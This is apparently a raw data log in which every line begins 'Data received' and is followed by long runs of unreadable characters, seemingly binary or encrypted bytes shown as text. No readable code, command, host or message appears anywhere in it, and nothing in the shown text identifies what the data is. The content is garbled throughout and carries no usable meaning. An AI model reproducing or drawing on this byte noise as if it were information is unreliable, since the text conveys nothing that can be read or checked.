Data received	MùcU&¨ð>_ì?òÞác<¶ãçNU\|$Êïë³Õ #é]²ü¸I!=Ñ«tbyY»0ªà8´Gç,tßó;§KõÁ.ýh³Üÿá_þèÕw¸ÙGYM¸÷H{¢÷¢ a\|?é<hPüÉu`ÔR°C¶«Cw±É ¾cIæ7Ý¹®9³¡a§Î'3^a.ú8)½!à©1èSØ¡u¤Ta¯ÔT¨õg%!1äíødNHfóZàÃ¥þk`.ôÉÌ?¬x± _øÚêÄ°´ö¡I,bê~´0wJè¿-ÇXülLø¥×oÞtföØãq%óB÷õäf1zoªN.pæ@©.Ëð,}4£¯/¶JN¥4W÷'Ì0Ößýíë3Br2A9X·§#</ÛÌÈD¸$¾Õ»ýoe¤Æ!ün`ÄkÇî$'ÁY#Ü;äßþ¨$rþÜãú'"X0hÃ3`¡kF.¡Èn?¥Ú'[+ÖË&2_ÚÚ#Y·Hoh´ñ®×anâ¨õÙÎ ¡º³è1{Z9ð_NªÐê_¶öÒgOûø/w9kbôï(DpööÝÉ¾¯¼6fÂÕYçÃýóã<ûXßìµA=%`4ÈÊÀ#D¹Øÿr)®ßà§Y)ù©7¶%± þþý}½5+¢Þ3xOZ%s4Güo©{õÕÉSê9IEf½åQDxWçÉv¯pÊÓmêÍ fÚæÅÒYÏã'¬3¤{÷BúOÒ8;`ÅC$hGeI$ó<lVLó9=ÙwÍÈjZ,ÖÝxÔñb¿YcjL_ä1Ç½2¡nCIqÅ%£ÒÃ2þþädj ²PdSý_¸Z]AÎºmÆ.Jj=µ¸lÃÞkÞ~¤<§yé^:`$%_Ù.éâ5¡'À½3Q·çe hZ.øËS"=ÃAö.vVÊîuNxçÃMzVò[Óã4ÐAðöZïå\ãFIÆE^¿Dq÷¨ÿ=DÜìñ4 P4%¼!ëãÊé²a[Ù~hE+Òá¿ñcð.§µÁíUV`+éHgæ}Åá;xE5ÌGë5_rÓ©¥:Ù`_¿Ç,×¤[®LörÁËlÒÃàK½ÁhåÂõ ø$\|6´'ð \|fHI4íMÃïÆê*[Ä<©ëKÚ^cd7ÏMâÅà¸> %¤f]ì¢r? Þ/Múýè?ÿïnÆS®?T§¶+ÎRÂ`O"ig¡ÜÝI;öö·{Ù¬kH9»¦.s4z¸¯ãC4_À@ëðë<ùþÅpùÿÖìóó~ëâkÒmÝñA²ßh@íE°bò©XØÅÝ©iømC@CWtÞ{®ëþß]É·ãïýdL¸©e Ôª ý¸î£Êf} ôÎO¾·f#Q)«Zµ=¤SpÚåUb34\e»¾ë½sèZXMT§ 1 a·d75îÕkíz¹ääGdà}ü@ª§õ?Ü¸\}ýMÑê1ñs¿ìãP6À:4¯ï·C°y¿å3Üý1ýX Eâw¦è÷7Íÿ}FqTÂÜã+ÿÏøN?Ø]þK¢µ
Data received	fGþoÍGÇ²¨ÙcÒlpYé[«!¬h3Ú>³"0M¸o.2¿¾0V£ñ «æZÅehüômiv{_v!¼"øXù'®ô÷=Ï)½´Á8 ½SÔ-@y æ·°z.!¬¤ìSÖVÖ¹E'éwSæ¡ÎÂ¬¦1Ð ´¬6FF}TLËmC0ÌÇþ(j1ËjÒbBEå²"ì1ð3¯¬Î,5x"·eWVÛL^NX?)°"×ª,i%ÂlZð aC©Ç¢åNusþi¸uº³ ãk ýôKóðdR%¬[ä%©½Æ7Sñ Òj=r¯¾Ùä~å´þV'òèJIÌæùzÔØì¡¾¸2í÷U/Fðjíé]z{\|Kö°BÄ¨òä &&í£ø£x Ô\;Eöï®øþÄùa¦8µ3ø~xF@hâT"ÀÂRÙwANÜ»+p!dâ¢º@#ßÈW\×âÈ2L[ÆçªFV¯>¼æý]jÈÂmñßÓheÖÆt¸Eª9ÑÝ¹¾×J^ëâë,ÇfÌD¡ ¤Òj¥uY\|öª¸^Â·Ð_m«µ3èZÞªlÚNZ>¾]l$«6Û+Õ#qw303ÛtIõKq1ô-qØG_ôªÃ_.>~]îðPâ:ÝVüiìhvÓëÿñþ¾8}Ççfÿ«õ b¯Æàô÷iº¡c}B¨çm¬ýË¥C¹¸Õ¢ÂÝ¶,U!Ù%å»LÌñµ* Yüé#e¾]X^×wÊ¿j¯qt<BôwÊëõuö;´ÓÁ(ÈE%Y²idqW,¾êI¨lÈQÄ´öÅÄÇDÖ^Ýü%©iþQ>TÄ.ÿ£öL{Øíû ×ûì0IoN0¶½dRì§§£R÷¤f¹¶¨ón;½=¶¹G-îD(g½{nø}j¾ ¡ûEU Øã®^ôÝ@ý:&ZáDSbK)²[Áþáë7à©äEM³Ä¤Òl¯éä÷Æ¿ÈGu$g;¶=e/o6¹bqîcLy1÷õ%ø3bÉ×N© ÅñB°íÓÌiÞ@pte¦Z÷ÂkØÿñnò}oW¯TÕ~gW+Á¸4¥>'¡KÙóx<Ëú¨ée}ëqyX]ÜZtmKËvn«tkØDQ[ñ[×íñ!o× ®ãtÏ1ðçð%hÇS½ÕÉÁ¥±Vö3óe3ÜqÚ¾5u4Kõ}¼¿»ÅÃ7`aË).×ûh&Í¦»Åí«¸D@zCä»FZOÉ(¥TÛéRÓ6ü÷5æL¸õÃ8gùkoÆ]ª3Ä=Æ4sÚï=ÖÛrô 9ØL-¾ª>iK];§Í·Dºú`Ã¤xëc©þ&)@YajâÛû¸ÅNYf)ùaRK¼ËoæÙwG¶øå"°yvv©4vïÿC{»ê4À¿Ï¡É«è§v ~yýK$L4ñ°(0Ô!"º92TiðëüÍ5MMkÌåxVAø2W¬VÎ^È_½ð«h¸!mlE`+ÊüXò"?ñþÕQYI»£.»u#x³·ëýóÃûf¡Ç(«zlÈ½cæþQ¢
Data received	®ä¼þIòV~îm(ÿ=®Èÿ{« ã~¹/XjÑ&ÕtädY÷ÝPàNsÞcrpíý~,TªÃU«Â¯üÃómÎhÞx'ÎÓkLÂå±ÝNxÝÍê²»ÆU¬³ºeÄa»Ó¾eÒYh¤ÇñÖ9f}Â{IðÈKºl«3ÊP`Ûk®ã×Ã~y/P[Æ¾8µ2"VéÖJ{Á?4ÉM¯§BüqgâIuú¯æO(×c¶1eZã `þ×vþ fÃÃêÏôó¶z«/'ÞSM¤¬÷³5´©^8¼§ÊÒøè4ÑÖU{mV$Ú¯¶lrù Þ¡§\8ëe©Í£¬{j»ÝÃòíWÉÐ>C¾Hã¡ÿótPù¹ Hó×¶ë?iRIürT µ¹Ö0¬Ç§ãUü÷6Ð:7»ëi%µ½ypw!h´Û5ÚªúZ' öÒÙ²%zLOÏ1¯· _ã_¤`KÉø½3³^1Â+ÏÓ7ß"t¡¸é£ÒóôDÞg5Ä9W³Ë¦»óo eÔ÷ÎÍÝÿ4Jíóß¸Ü\©}ßp66ï±Ð5óU´»JØDX9½\|Úd\|;ÓÑB^®è MkwìE^·YGµm,VÊûìºZPx«0Oâ0èÃ5¿\|é ýõ¶5ÎÏÚ~ã%¾R(ÑØ8 !ãÖ £)üº.í;Ýô þ9àºxò7Å,ê7éÛNçÃ,èfsW£&à7¼¥ ±Æ>îÁ0Ò}ïæIÔÑ=:ÐH«â»áÿ:oKú=Ïü½N#$;{G6Ê=9m`¬é¡yuH<â/à¶:"\ùPÇÓY]nÔ¯QghÁÚ.K¼VWè&è¸MA·E£h¦++¯;uÀé;¿Êt¼`ny êpJôü©"çÖûvKÙùÁXkúÀI¸äÿBR[ua^9éKWh?®åÛìduVìèÁò+Ç®õØ]¹t÷êÂ]ÊB5DÐýÝ@2Ü4ÕÃêb)úí 05ÃZïÒ ËR\®?¸·=Ë ¼-kó_ÚÂûzî#<@Áç¤-± ÝE7Zÿz35ÏPR8äÿó¡Æ\|båËÓ@¿64EËCqÞ@ÊªÎ¼µ(%× lI\|AqWhO³`¬.{y]èûá¨#Îö¶Ìº Ao7c«Gúb÷Jîn" 2à4mâØÃ[âó/Çu¦Oð13Eò@ÖsýÃkÒjá6j ·ºPÈJ{ÔÐTÀ®%SHìG?TîTÿïpÊº¿ëimT¥Ú:öé8F,>Kô£È8°ÑÞË7ØáÐ¦àÌn@êSq,Á¹cØf8ä?c¼æN±<#G3\ñgf¸GæXÎ©@r"Ì!+CÚB-zÖ>t4Q`±¨ ÃhËQmð5]K\|Èmí5ëÙÓÊÎ¨ðTÚ1&pï¿õx;ô!5k40u¥Ex\|pÿT'òr±KZ,(®'°Æ©FlHð'%ÈÞn²scI¤¢TÀÕËhR¥%Íú?ìëö® ¬ª£Ôò;MùîîÚ®½Ô92@Ìüó£ù¤¢gyÞfð
Data received	I_²æ`û.·¤Ú©ûd»hØrR¯
Data received	jz ø©Ý8Xn0Qî;I±õ÷g5"ãÎ2ÿHüçP(lâVõóä#!õ}Þºö;ìbÀ.á!]PB)OzJëCj³ÅºZÞgáCÄFX¼Á;Êócç«¬ÃúÉxsÛÌ$1;ÃY©ÍpÓ¡ÓÑu/ýåÄ#.d÷Ú)?Â?îiòåiÊÙ"½9as5g¹="";.ç±n}íõ°_f à÷{H{4pÿ®ÏFÓ8ÛäÖsü -WcM6úø]cü5Aòé&ÀvlIÀA»åHi\<@Õú+gù]]ÕD½ !ÀG c6suÖ;æ²¸¸nÅã &>ÎRÖi(äÝb+`¼k¡vôë¯GMgÜÆå^å)MiÛ¦R ßQbJpÿiúÂÞ+¿jÍ¢w¬æÀ(Þã á1z²aÁ{^ïC©ÁÇñôå« Të:6¡ýÚ'«£Yº±)±Ìÿñ¦+F#}p¨]û2>Ükü¸ÃY-ÇÕNV¥ÖÉêäØ{}¢eV²&Û(qËx÷³^ô·vÞfêbÿ^ü³ôvXp}¤Qp²ãíÿ÷H<q¹XäSRÆ0eðÞ?.ÄÜq0+fOú±vÙ#s¢nÒ'ÿ¥(mE}» ¬¦FgÎ¸o$~ ó/bñÈN©a÷.Gñìp=>x³EgH/LK®°ÍÊ¼³GÆìÀ$è¸ b)´Ê\güÜåãÌåZAaORßç÷Y·Kþg¡ºQk}Ì!ÿêé¼Ï>zì?´z×°:´ÕGäÜ¬8PLVþvöÝÕµAê lÍí;@ÍõxêkÓ £êÃojSF©íÞy!iÑî©¶øKhá\»j:^x8DæQÉÞÈJ"¥mGñ:ñ1&9\;®¬HiëìGéwdÑ Zxñò#'6cØÆÙ°üxa©zê5¬Þ©6úºÎ RæXÕ@¨_¥sÁð i¼ÏnËUÆÛ(ßAËùãõMÛõûô$ÉÒ.l «¨5ÙSÒ/wgE®âÔ-Ì]°Ok#A[94@/Ç)!öÍQã91ø1¨#9Pb¥,ÀREø-LÖ4£¤5Ä±ó²:5Bv¬´ÔS8ùèhWçTþ«Úëÿ¢£ùÔ+}-h1ö ò÷`ªêÈ°3PÊ5oMtÍïèâþÞ$1uÑou !tx7ß Oñ.a6òúû3`ÜÝQÐöÿ¸{ºÄ`Ý¹{qeàëa)f? Êô~sÀM¸C¤ÊÊ§ÁBF3°ô¬ X¡ÈíÞ8áÞù,x¬,:æmõG÷¾-¥²ÊÝØ_n$@ð+1[²è¯Nÿh,uýY@³b©?µs#ò©RQÄêK¤GP3`gîàÍï4:ðL æÀd«ÞÜÍi!ºßO/Rîöq7Èo: hqÐÙV÷#n9ûÇ¨;:9¥¾ûNOVçSë[r ¶Å\|:ÿkþÎÉw\Ç¤{±¬¹¶^Hb0e¥jRhxëøkP¶¿<g&&Ó}6
Data received	P
Data received	yáÁÂÎk±_m©7ZùÈÈªÊO6gàb=;å"xåñàññ¨¡>rnMf,i¬ ¦7J6Ò{ï¾FO¥ÊÊIÉ_RóüJèB¶i©ûÎÁãÜ(û#5»Äÿñ=¥Nçø$S ;ÌövðhÀz¢mÑjA8 Þq<?ò&kÒb{C·Rß[Y¢1stæ£ P×ðKû`Y!3ÒÚ0ÆM©0GòØçüÿöx`èÊy¥Erÿ§êØR½\|Å¬1ÇÐà½kôhY,°©¹Û£] éLð¶3âR«uÒLÓ¼öGvJhWÈñv OmÇÒwB±áuGÈéñìDø¢Q½'¼3ß34A×Qºe\|¯ ß w¿¥¯[bÉâð¢¢íl·.0§z¹5!û¬>ûY«cHë½-OëÃç2?¡w¹cë¦ ÖTcQgö¡ýPõC%'Ã42nâñl®§ew±ì¾Ð¯sUhÁ©$¬ºé±0K,.;± nqØÉ¯ç3±ÈLÿ'ç_hÂÛþd5i#OþòHhO,øÞP¼<#ÏýÀ"H\|í8 ?w´z{Kw1¦·UÌd4Bc?bºáÖ É$üÞTrñÉd\[½~è¤mFãµÇ¨L6½O±ªÀ39SjzÄ mR°/Éû/åÝËUYbJü£®n®5þºLFéRÅáÌfÖÝ¹~1<aø¸c`eð8:ËqKàïóÊÛÝ½}8£3xÙÙÊ±âYÎ¨MM Ul}ïNf®LHò=ªxQÖµ nïÂC.× ÷1aÙ¾,y¯¼r& wÎÿªIeãVÓ¶4Ç8ÀúørgTIf75ÇY«;UÍiÙF·ùAË¼0¯bQÔ¶RÅ»Àx}äDÇÁ}ÛÅ,éÈKC;¦,JdÎh?Q6Ïl÷>eA}ËÕîb¨4½]9¯Õ 0\|A±èbØ_\ø\Íà«°\i/ä,öLgqQ
Data received	b«7XZ¶ÖXáø#'Î=í>ù¨·:¢NÊygl¦ßhÆñiÓ:Þ^~÷nÔ¥¹çVÃ¶ËÀäÑö~{hôä! gÒ»üÒwT³Høfk!Mbgr>Õº'Åèú÷2>NÕK¹ç½½G×ÄQRGøPÂh¼¯î½°ûO\|Äc<O`\÷)?4l¶ÌJª6³4½ËüÃÈøZ;èàá^ o¯(%¬t¦Äv)yðµ¡)ù}½¼"©éèx X. àvÎ'wÔÚ»Âpÿ6AuíFëqZIÙÔ¿Ò<a.äpiÑ?ô@¿â45bPtVÞÏ©+u'hBÄë0¦PîA#£Rr¼©3óê7Lf3ív¢HÜî"øT1ªCn¹JÚoGDà8@Ã(Ñ8îñAþûéÌeÂ,2îÅ1 s½âoS×å\|Ei¡Ó¬#Ó6JßÕ¿n6³ü]sYÓbW©º\ÉBÝÐ(aèÏ®ÇvU%\|&õ}cà×Ô'/$ÛKÐµªlJ0\Ôé<{Õ/höÿc?ä¢»xUL¥¦íªkd¥cµc?¸gÃ+-T[:ä·'Yá'Uîw°DKaÁ¸CÞ9ßÂJ×äT£ïñt-§ fþ À3ÙYXü¡çý_úÁTÇÁØ7@µÍvÌÑÛ&+&ç¨²®±õÔÜç ÌN9ë1I9Þ&©a«sÍ/ØÝ<ûç¨:F~ô]çXj+Òj_´ÐGs&!!%C?¸fðâl£5åÖ¸ á =DLGÓÕtfH¶tº7ä òì{S="AU¦A ¸ùJ¸ØaÓBª!ä¼Ol=jf±Ú gªÃúFåz¤ÖTu\Ãv/;ùßO- hWéc£êÕJ·"Ur ÕB~EÙcw%:63 {b¦^]^Öò2=¹0Ô¢ÜtûÌêû3ÃÚe$\^ý4%:u÷M×mV/»Gð«¡ÿ§vaüFä}ïÕíÐ2ý³æmïÍg£®¶Ó"¸éïÿÕÓÈ=MÕeêk÷ÿÔSÎã#Ã`?TS©º±í4Sicªfù¢´$ÙùÄ~Ò=¸XÝ¶ie"y@sÑýÝ.´P>´¹Ìc[Éeÿ´,Hö4QøCiía(¦ÈiýþË¥vSG:[w®AÆ:y3ÜLö³ÎÔéÁû¥æÒò¥lð_ÑA¢Ù1¼xciîõ:l ãbÇ²ÈÒ®Ð¬mm_b~®rLÝ¡l½êWÄh·õüT¸îìJ·Põ"{WÕ2¸tþÒc\ßoÌ_@ñä ³´AÏù'à:ÓiN¨bs&`7ÛôÏ¨tìIàC1"¶Á²øômÐ© Ëà2÷P¦z³nO]£-HÞ mÉß0S#µ¦//\|º«ù¥Ã¨%$·òÓÜÑCJ)aÁLà \ÜN{ð~øÚëMØ0Ú£üïóCGgz J^fçÖ=0Ëù°Ö\|Oç»Ú+u>&H[¸1L_ÔK¡'xúÚw$4bÙìÄ]Vô¦½_,<7¼m¥~UÈÌÙý_{y<¶¤Ó;Û¨¾ýÑ÷_¾ç¿~Ñ»Ïí÷;¾óVÞSF«Èº{èA¦¶-R4ú æy#
Data received	. ÓÃìBÙÇêÕÌIÃ]ëÉïàf²`éÙz>ò \|öÞv RAel¦ÓE)ÍØ¿(C[P)²øáÅÈÉíàÜ[PRÅï~pÙÕeÅNgH'¯oR¥¨ê"XSÊÃNHÏ»Váè"h}We¶p3á(6DPgÃ6²æf4Ë )ò Î¸õwm´ÐòÜü²½Ü>ø8Ô{³ßyÊF:Ô+Û ä"H{»¤öÌ9¨õ¿ÖQ7/§~¹C ôù:ÙÉâÆµáÏè&óAÊýÅ¤Ãá7»éÿ_Ð¦)!øÖ¡JùÍûôÏAMY5àÔµßß¤¬¤äàãÆ§@Þ¢+± v3VÀ ÞÚë·«if®;÷)07ð</´Ï7³6;Z¶¿®þvnOªz¡¬øEè"ÿêÓq¹ é¹3ÒÒþÐêbQ,Ú»ex¦v`Å.¹d("]näDÑ=1äú¥éÖöÙÉôýcÖàùsÄù-& åìÓW#*´÷òXõüh IxOú²@Í >¹À¼®£ÒåÃl`¨'~§¨ ý.¹³3â¹T\5âÇm_ÆÔÑÌV[¬õæõûMÜæC¦&kVç·¡½:Ìà0(Etn.ê5ö&KN\A]"¶á¬?åL½G<?ì¦¹#30VÛÙJ¯íØ¡»^ÒÚôQ×1çÒ\|ÁQ´?7®ÄÌÛ6»» Ï$±ojÞ+9åïôÓ»p2©ìÑMÞXlð´§ ScæúZhýªèÔävã&²÷¡ÖöÇÉFxu9A¼s2_Ç=Có¼<õvv7p¥\|Ó8w[^AQL?HIVÿ¼ÊpÚÚÍÆê¤æÿýh7íç:Ø¥7ÏÈûøÎ;ÃXæ¶zøðô6g-Á¥°ædáóÝÈ g·vfë£Déñf6ì¨4TÅä·©Ý©ßëYK£:TcR2zÞ!²^}ÎOä{½°õ[Voî¸íOl{U¡¾ÌHaqoààStÉ ¾T[sùê0Kÿõ±Òþ7µúiGÿ¾JÊéL)}¥gîc.·ÌAöd`>WwbþÐ j8;à?«¨y#s¥V"ru¥ý×»+tÍ¹´R0÷ÇUórmj±[I ÀIp3õMÇ\"¸w5Üéµ69ÁâÜ^¤hC´%wãÒná¾ù0Ë'«Áù'Bg]rõ$%!$ÿ+Tû{GxÅØ2q}¾ÚÀÆÅØoËÒÁÏõjTL¢ còôè]zÔG»ÆÄ±<Þ¨;]%Ë} -VêÉ©nÃaØ:³½nd)-:ë¸S§¢sÆµUmÈÐ9ÌK£HÝ\?T0Zä>a1ÂéØ ôêJÕÉUVÕIXßqÂOCºÊ}ÿ ö¢²ï.]ØJSãÒPäo%E¢RÑ@T+¢R×<ä¸«¡Æõ/ÅÒSæøEÈô²ùj¬ÓÝõè/ãí¡¡W½/,SÎ¤Ó&ù/¢gë:H{2öX< uÃÃ]¼Òß£gcaô`C¯Ðë!tC2þ2yÌ úË~§6à¸±¤iL¬ñÓÖx¥ñ©NìÓKtu±àöM9Öåf8¨cx
Data received	/Øñ±p£¯Ñzô¹Ä>«v;w÷M<§ ØÐòVîÜÿìsy$EGÇð+z×ñCÑêrÜ²:î»z~q´ß²¢k?d.¤1ï¡v&£d;y@O½¦GÞ '!ïE(¡,pæ4ÃÞuÔ9N¼`?_0P={ê2qB4Õø·?ë³ PöS0îF×n'ð ¹ÈûLJ¦þGB:ÿA;nëû9(/¾ù iÔôo0ûÊ¥¹ó¤ò[9 °SápªP8àÊ8ßAWÛ ]<D[¾zÌÖÛDº,(¾¿÷ócz_dÉ¶A_{f ©3(N]×&§²6ÄÔêäáÙÑÊ8HÁíºàÒ¤?=o(åZa«ï¶(½¬,n-k é×4K-7hp!mÈ§\qm¨½×\=P¸a~XH\|6ÈE àTywÙ\º«A¾GM¶P-´ZæÆ ¤Yû~3 \|ÒN¬?ãt±9,0÷èHä`¦MÐÈLÈMV&Ïé8yé\]¦q3&4Û:hÑðªåc®ÿf'WCnól%Ïn 9ÞÐ.dÀ»_Ó²"ÛÝ== Ö¯ûn:¿Îu²á&>Ç¼øÞ ø}¬W7GýúÄUf¾ ð{$Ùi¾QÚÍCrÿ0d:fÔó½(_Öq`McÕH÷7äë[BÂ8±d <úÍ¿ÝØ¼ÕbNeé}>¹Ýðÿ %ZùP`ÿT:x8/<"7hßðô70z-éÌ§~<HéR-×ûQ³û&×uÚ:üÁêiÀbuÅ¥?UÌpj7ùfÞèPwIþ¿¦"· ªy B^+ÝÊÚ%I4 à F¶þ[k;\|ÒùÞ×ÌV\|8¨ó°Õì¶ßÚÐ£cåA³ËjõÞ<¹Câyé "@÷ò_î½Kî£³ªÝ ;l&â"^ÏOç.©ÚÃÒyPIÍ°\|{ÖÝÈáýøµ7WVç[«ìiZ>Âû1´Ù8F>ÇDÒ[Êu·ñ?UyM=Hn£Rà´·p Îþÿ^\|4vèI$[NUC4×Îuà¡¹ÍÐ¬äÇFö§ÉÍ8ïa¯ûe·9lQsEzý\¢Q¸}ÄåäÙ 7ãú±VJe) _:ÙöñããxñÇ+(\|§´ïw=c<ã~æs#©zÓ`w]ÞSªK<!¸«§Ei3Ð"»ÚÅ¿#§áÓKÿ,n¼¹IUs`¤¹=y$CÆ¼¦Åf¡[_\õ1ùcCÊä?;jÇ{I¶oÛ° à»·© äý¶©Oo>tä¾M:ÏòÂ\Óðõ[Wó]ÕXõ'³ÓqYi?!Ïî×ã\|ú£:pOÿ2RàÜ¦?¬léa:Óa½«4¨´ÓéÉÿÐ£§eÔ4ðÅ);êü,x.#õhé3:²ÀßÎ Î¦þ\ºõfó 2òã®¾âÆXæßù;üLÚïqê_@yÃeViÒe©(nèù4õu{T=ßÙ¸¯°'âÝáËÒ¤Ô¯Ó¡KdZ¸ á ÊÞû;F%ºë,û8!£C
Data received	KØTQíúõ9uíR2×Ü¤\z;ß-øðàsõÄÍÁ4Ô^§tù!µæÍ$6$_¶±à°¢WóÙ¨4}±78BÎ µâjãÌÀ?ÀÐAê¤Ï:8+ (ÅÕÌ/S¹ÍITß?¿kéäêG3ÖCæÎ¶!È¬køðÍMM.$.Y`z½ÂiàÓsúrë¹0;ÿRÖïÊ#$ìÍ#+XÁ;ñÞOÐ²B/i=â®[m-²Ør'Þó+6£¨ÜÇ¹£ÈûÁÒôQäºA.yçûQ:¬J)%Ì°«Jú&þÈw ÛÅÞUP§F5ö:%4s©t;Ô&·_ YA¬b#eòýûg¡Faò¨~¾Ãó~)?2ª]·sÔ>¾¸ÕÁs=ÖáÜÈFy/òÄÈ~oÖª¿mÏÐt6àØ+Æ8%ç/¾)!ãÖæx ë©l6°£&cÁBËÖ +²1Õ6õâclç#ÆêU.fY´Z/uðÒ®´Hê.¬\L²ÐÐw0´S9¸ÛÂº~ÐìVÜÿrÔBüä~O°§¿Y~0¾³>éqÖöÞ/¨[)9¦@JÕ4ßæ×~Ped`êñ'ybz³¿raÛJ`)Ép ¼+L'Ä¼uý0âü\|A³=æ4iou0à#¸ü¬cGO ç§õhkcKøéþ%]Æ-Jµo¸4=}Ó²þBªûÏk&ügæâQÂç©¯r¹ÒErz·Ñ) ÖkhËFÐ2´. @rPDnÚôk år)¥õÿkë±2vM{N#à¶ ~}ôrä£ó3»ÛÃ`û!9ßËÉ¬jÿgWvßüf&ð¸ÐúòôH¸Qá "VOÅ¬¢BN»V3ëÓ×ñôJ@µðË¶®×;sÏîÜÉ¡x~¶³L kIaW·¿ýµÒf=hÎâ·lH9B\NÜ[¢¡íb.³8¼vsM«øàîdW¾â0Lf>ÞÿO@MûArº. MGÃ«üãã:ÃTÒ[+<ÔÃni¶"6°9ÁêU.ZU(Jo©üWZ\v 7%d¹ß+nÂ×hiJ@G8:8Qè=Í-ÇèÅQéQ2GG'üuÁúpLí.Ì bÙp÷7ì#ü¡gðsq÷¶%kJÊqÝþ5«Ãúç×y8«¯K}°cÑ¯Kàfeû¢/§û!%þ£,l>t75BÝÞ¤#¡ÃOVÂ 9½Í¡$<Ñ®d;*ËÄ,mûbZPE+þOzÐêÑìe¯éA^ËÕ ào¾÷§örzgpÌ¬êÇskRb:0¤2 tLÞ¢\|¾èjõ[Õc+È=`q Íí±ªÂÃ¹)sÇp¹ ±k:+¥[v;T¾ÛKËËÔá;aÂ÷»¸Ê`5n)5OÊM{oÍ¬3à¾µ Êü1l/[4Î7ªº üí6TVb\UusÒ BÂÒÇÕèhú/JúE§mXWßp¿¬âµðf%R_1mâÐµ=oÝýèùA\Õ2ªoJH¥ØÆct²ê2,b×?RÕBÄ,ÜÍ~N
Data received	p¨¡Æ5×!Qnß¿BÓðèòñé:vâÞ÷Ïï@hmjLÆÀ`dà(k5ùu×uæÔ:0Ï ¼1åùÔg¨ÐAuÛ}ÜR>øYÊÊ-ÉÃ¨GÛêj¼g®Øºà3ý1p84/i°¶Ï¬sXóÇ¡åLëGdº/YtAôsIõÿÅÈYxz:Ä!²µû!e%Ò/¤¨m¤ª×¥æ`_ ëä'ÎÇ~¯k^]>Õafí·]½ã>¢ã¨¡Ò^æäÅ:ý Òq¹m"¶Ý®ûÞ,àCÏ£Èâ±g¢ïÐ-I4M¹Ëvýl÷ÞZWõ¼z®¼ðCabö¹8êì!)÷ÝãsHóD½_#å+jWC2¥Á¿k) ¯}¡f¹Ñb6¨[h]Óp:rÌ)måïT:ÿâ&CÈNÀä´[¥M uÔ Û+Ïp>²@ÞæìQÌÖCÐ£^$ûoD¼»»»®Ô_Ç)·¸ ª; 0µ«\ªLl.f]ú"ëÔfÌa8y"Ë¥cµc?;Éw×GóD¶2O 5v]{¸ë´àËÞr½îâÞL¡þ^Úá: ²79ò]G ØÃ+qZÌwÐQ±[p'Ùö]"i¿ã«ORºY¯]uyb»¢ÝáB?ï êàmÄÚÄ÷¿âKLB-ì?&æßàë DGSl\|É+:/Êw"4ÅÆ¹êzW'ZpçMäÏKw¼q)+ÝV¯°>î§VcØÞÉ!¦ÿáwÄ¾´Gú&±nÜP&qWò<ª¾#¾6ÖØydÿJ4õðS³9!2Ó+·+¾\úÛ>¢'nË18i5u«°Îéz±]MGà\¥#%ÊBdñMÃ¢]27'ë"'ùS&iË³ÁpSèØ`Z³j½Ëá°vÏhM=Çµã·wèd,d\PÕFQpEs+×6¹Y\|xGeeÛö¼örh°à8¬<ÒnkcFú!W&/_8]{çîÙ_ébwÔ×äUµMë·k¤ã /i(hãA¢één¥±zº8IÁgÚäËUaé¡ÞZÆÉ¼tJòp¯¨JÖº£.¤õa'Òqñ¢Wq¥ïA¥Îáöä¬£½·kcORâ3ðü¼DP7ÏÁ QáRJp%Íq»6Ý¢%é}q3?9Îë¿øðÕÃ/\|úê5^ð¥¾]-ÂÎÒößBàlI&?pìçÒHQ?Kû@ÀuÅ4¸ÚÚ\×~Áèø5 Bão4oY_¿«è³ú²'3Ë{-s/'¿ìCó±éxiâ%my¾Ú2qûÐGG"fÀj¦R}àÀ®¢3©f¹C dò#GhÂ12p¾?Is'r\|mÈDwÈÉ(Mø\û»Ëí¥Ý\SB·\ ùÀ`©$¿ïMÏ^szµÀ«\|$æ ~ÎúýMIºÛæ6ê04µo;ßêâ»N·6Ñ5°Ú@Ø¡snÒ£Ä3r;çe[¨®6ÑØÁå_µõÉn±ÙíîLòÚ@A¿i¼:ïâ9x>ç2èîÎM0ãa?ZLL<]6>yGå¢Þ«JÔª2[ø¦K?19}ôKô.YJÀö¥´,¼9Äl_à
Data received	X;ÖÇªLç6×tØ%c1{Y.7
Data received	ÐÒ+sÑá~'Æ¡UÁ2±WsÅmÜ#]SKýêFü¯bÕo7Í$"uÔqÚÑá»mÊjÔÄ¾]N©ò´ÚÀÿ %YéY@AHðÃv¹ÕMï§zBH¹ùëçîà¸´áØªÌ]+à&rbÙ8ÁY¾çY=;cpy·Üé\oüòç3l10ÔOeÂäÈ[Â~z}0A(Ã!éÀé !/ {ÖKê$`µc/IØõ1 Ë\ ~¨;§@áÐþ4?¨Æÿlªó©Ð=Åq÷ÿà3È8êJÞ§DÖ¸\U7®û·ÑE¼ËèÄ:%äÅÌs0Ð Eyk´ª5únÃ¡ o1ìå8ÀfIã^z-é#w3Úh6G~Æè( a4Ï©^íMFAßºT¶/Y]_J} ]£ã^Ù CY1øe£sæü.#ÎFÄÏR+(ýÎám eçÚ¬;O`,&Æ×HB.\|Ú£] #d0,/Â=º=^lCù¯Ó«% $ÕÈ¼ÐÆ·~m\|¿Õ¢ÿ¤£½#ÏHü+âw§ã6uð²0à¤bÎÌ¥2r÷#CéïNqÉ0OÕLAì¶ñ°Ù.\|ib»ïVG!ÿK5Zg+ÄÈöo,dû¯~÷H¤2HÈ é°Ç¹¿.Ùw]m\|â Ô¼Ù `ùÏaÃ¿hMi;¦U®h¦ÇòG¥»ý©O>Vq[eT æ(óð³¾ÀÈU)"òK ëÝW¦ù«S~;gÖ;;m2gú§Dáäö²«øºÏû£"£ó+f\|¼ôk²ÙfE@<^WòO§I\Þ It¥!«Ó îÕ%#6Oû²på#«:ÒÁà A!o£nsÓ®fqÂéo»^>Sq!· È0MïnÀ?-¯3þ´kØx\|`äbL§Èáý¯fíCÏm¡ÊÐL+@;}}ç©'d¿£ÓÙDYy Þ5Üoñ£½êhøPãÆ¢Õ+³ÐD}!vEú2¤YQh¯<AÝÐ×(ÇÝÞ3WÊºñxÉ£ nðL à°éBazÚÕ9;ia®NiKãyoæÁ?dºK£êxÌÖs¿%b\ðûÕdlFÙ, BÈñ6¢÷uÒÎhâ§]¬SÁ$Ñ¿Ô~s§u{åiÅQ@¼j{9ÀQÏ0ÉEgðBBÞ³(a þC?ÑÁÖÇKG %¦ó8òÑÑ»'ÿÙuÝ>ª¿>äªÊõ$àM;Î¸9Ä ôäaû:ËJß´Ûæ>«zhcV>´}Ñ`ÿ1¡Ï8ù·2^{Öáx¹Ï}rp?© \|?4TAqAÑoóòB0þ»ÄF¼Pk¶¡Å°ÜìkÑ!°Ây\|ô³ü±Êª{®¯ûÛrë>©ëÖ`57¸n«àÚo=¿5°V«x]¢+ÖáWÁpjñÔ}9)BÑcíp#AÜÙ¾8Àz¨¡ 